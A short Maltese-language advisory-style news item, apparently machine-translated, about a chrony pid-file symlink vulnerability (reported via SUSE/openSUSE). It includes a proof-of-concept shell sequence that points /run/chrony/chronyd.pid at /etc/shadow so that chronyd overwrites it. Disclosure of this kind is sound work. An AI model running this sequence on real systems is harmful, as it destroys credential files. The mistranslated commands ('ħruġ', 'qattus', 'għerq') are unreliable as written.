В
Il-vulnerabbiltà hija kkawżata mill-ħolqien mhux sikur ta 'fajl pid, li nħoloq fi stadju meta chrony kienet għadha ma reset privileġġi u kienet qed taħdem bħala root. F'dan il-każ, id-direttorju /run/chrony, li fih il-fajl pid huwa miktub, inħoloq bid-drittijiet 0750 permezz ta 'systemd-tmpfiles jew meta tnieda chronyd f'assoċjazzjoni mal-utent u l-grupp "chrony". Għalhekk, jekk ikollok aċċess għall-krony tal-utent, huwa possibbli li tissostitwixxi l-fajl pid /run/chrony/chronyd.pid b'rabta simbolika. Rabta simbolika tista' tipponta lejn kwalunkwe fajl tas-sistema li se jinkiteb fuqu meta jitnieda chronyd.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
kronika$ ħruġ
għerq# /usr/sbin/chronyd -n
^C
# minflok il-kontenut ta' /etc/shadow se jiġi ssejvjat l-ID tal-proċess chronyd
għerq # qattus /etc/shadow
15287
Vulnerabilità
SUSE u problema openSUSE
Sors: opennet.ru